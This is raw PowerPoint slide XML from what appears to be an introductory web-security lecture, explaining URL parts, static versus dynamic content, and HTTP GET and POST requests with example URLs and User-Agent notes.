            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7871"/>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150" name="Protocol"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-91817" y="-197561"/>
              <a:ext cx="273092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Protocol</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="ftp…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5092977" y="6545980"/>
            <a:ext cx="2441948" cy="2428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urier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>ftp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>https</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>tor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="155" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7706506" y="4273929"/>
            <a:ext cx="5496913" cy="2326621"/>
            <a:chOff x="-1334983" y="-1619306"/>
            <a:chExt cx="5496911" cy="2326620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="153" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1334984" y="-1619307"/>
              <a:ext cx="5496913" cy="1000020"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7871"/>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154" name="Hostname/server"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1240902" y="-197561"/>
              <a:ext cx="5308749"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Hostname/server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Translated to an IP address by DNS…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9605067" y="6754135"/>
            <a:ext cx="10460356" cy="167709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r>
              <a:t>Translated to an IP address by DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:t>(e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>128.8.127.3</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="159" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13402486" y="4273929"/>
            <a:ext cx="5922827" cy="2326621"/>
            <a:chOff x="-1434533" y="-1619306"/>
            <a:chExt cx="5922826" cy="2326620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="157" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1334984" y="-1619307"/>
              <a:ext cx="5823277" cy="1000020"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7871"/>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158" name="Path to a resource"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1434534" y="-197561"/>
              <a:ext cx="569601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Path to a resource</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="http://facebook.com/delete.php"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3929861" y="9653092"/>
            <a:ext cx="115874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a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>http://facebook.com/delete.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="163" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10807093" y="9650117"/>
            <a:ext cx="5696013" cy="2065923"/>
            <a:chOff x="-2144874" y="-1619306"/>
            <a:chExt cx="5696012" cy="2065922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="161" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1334984" y="-1619307"/>
              <a:ext cx="4076231" cy="1000020"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7871"/>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162" name="Path to a resource"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2144875" y="-458260"/>
              <a:ext cx="569601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Path to a resource</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Here, the file delete.php is dynamic content…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860818" y="11797882"/>
            <a:ext cx="13448651" cy="167709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r"/>
            <a:r>
              <a:t>Here, the file </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>delete.php</a:t>
            </a:r>
            <a:r>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:t>i.e., the server generates the content on the fly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="?f=joe123&amp;w=16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15537194" y="9662119"/>
            <a:ext cx="5490444"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a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>?f=joe123&amp;w=16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="168" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15563772" y="9650117"/>
            <a:ext cx="5509133" cy="2065923"/>
            <a:chOff x="-2051434" y="-1619306"/>
            <a:chExt cx="5509131" cy="2065922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="166" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2051435" y="-1619307"/>
              <a:ext cx="5509133" cy="1000020"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7871"/>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167" name="Arguments"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1050523" y="-458260"/>
              <a:ext cx="3507309"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Arguments</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Here, the file index.html is static content…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399241" y="6926980"/>
            <a:ext cx="12074437"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r"/>
            <a:r>
              <a:t>Here, the file </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>static content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:t>i.e.,  a fixed file returned by the server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20115474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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="151"/>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grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15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15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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="155"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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5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16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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="163"/>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="16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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="165"/>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" fill="hold"/>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advAuto="0"/>
      <p:bldP spid="151" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="152" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="152" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="155" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="155" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="156" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="156" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="159" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="160" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="163" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="163" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="164" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="165" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="168" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="169" grpId="0"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 name="Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840279" y="3473911"/>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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Web server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14906248" y="3473911"/>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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Client"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769697" y="2385605"/>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191" name="Server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15729938" y="2385605"/>
            <a:ext cx="19900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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="194" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9419239" y="3698308"/>
            <a:ext cx="5545523" cy="1115057"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="5545522" cy="1115056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="192" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1118033"/>
              <a:ext cx="5545523" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="152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193" name="HTTP Request"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="648051" y="2976"/>
              <a:ext cx="4249421"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HTTP Request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="User clicks"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5904276" y="6336248"/>
            <a:ext cx="350948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User clicks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Requests contain:…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="8076390"/>
            <a:ext cx="15609094" cy="439405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pPr marL="506236" indent="-506236" algn="l" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="3400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4100"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Requests</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>contain</a:t>
            </a:r>
            <a:r>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="872566" lvl="1" indent="-508076" algn="l" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3772"/>
            </a:pPr>
            <a:r>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:t> of the resource the client wishes to obtain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="872566" lvl="1" indent="-508076" algn="l" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3772"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
            <a:r>
              <a:t> describing what the browser can do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="506236" indent="-506236" algn="l" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="3400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4100"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Request types</a:t>
            </a:r>
            <a:r>
              <a:t> can be </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="872566" lvl="1" indent="-508076" algn="l" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3772"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:t>: all data is in the URL itself (no server side effects)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="872566" lvl="1" indent="-508076" algn="l" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3772"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:t>: includes the data as separate fields (can have side effects)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Basic structure of web traffic"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4726817" y="449537"/>
            <a:ext cx="15609095" cy="193606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lvl1pPr marL="0" marR="0" indent="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defTabSz="496570" hangingPunct="1">
              <a:defRPr sz="9520"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9520" i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9520"/>
              <a:t> structure of web traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187405458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95"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">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9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advAuto="0"/>
      <p:bldP spid="195" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="196" grpId="0"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 name="HTTP GET requests"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4603677" y="621910"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>HTTP GET requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="199" name="Screen Shot 2014-02-18 at 3.18.59 AM.png" descr="Screen Shot 2014-02-18 at 3.18.59 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3137934" y="4865813"/>
            <a:ext cx="21233686" cy="5784592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="http://www.reddit.com/r/security"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7274507" y="3542738"/>
            <a:ext cx="983498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u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.reddit.com/r/security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3264225" y="10119132"/>
            <a:ext cx="18288000" cy="1480529"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="204" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3202351" y="7070925"/>
            <a:ext cx="10070964" cy="5290041"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10070963" cy="5290039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="202" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="251012" y="0"/>
              <a:ext cx="1886258" cy="480751"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18545"/>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203" name="User-Agent is typically a browser…"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="3612932"/>
              <a:ext cx="10070964" cy="1677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lgn="l">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:rPr>
                <a:t>User-Agent</a:t>
              </a:r>
              <a:r>
                <a:t> is typically a </a:t>
              </a:r>
              <a:r>
                <a:rPr b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:rPr>
                <a:t>browser</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>but it can be </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:rPr>
                <a:t>wget</a:t>
              </a:r>
              <a:r>
                <a:t>, JDK, etc.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9274273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 name="Screen Shot 2014-02-18 at 3.21.27 AM.png" descr="Screen Shot 2014-02-18 at 3.21.27 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
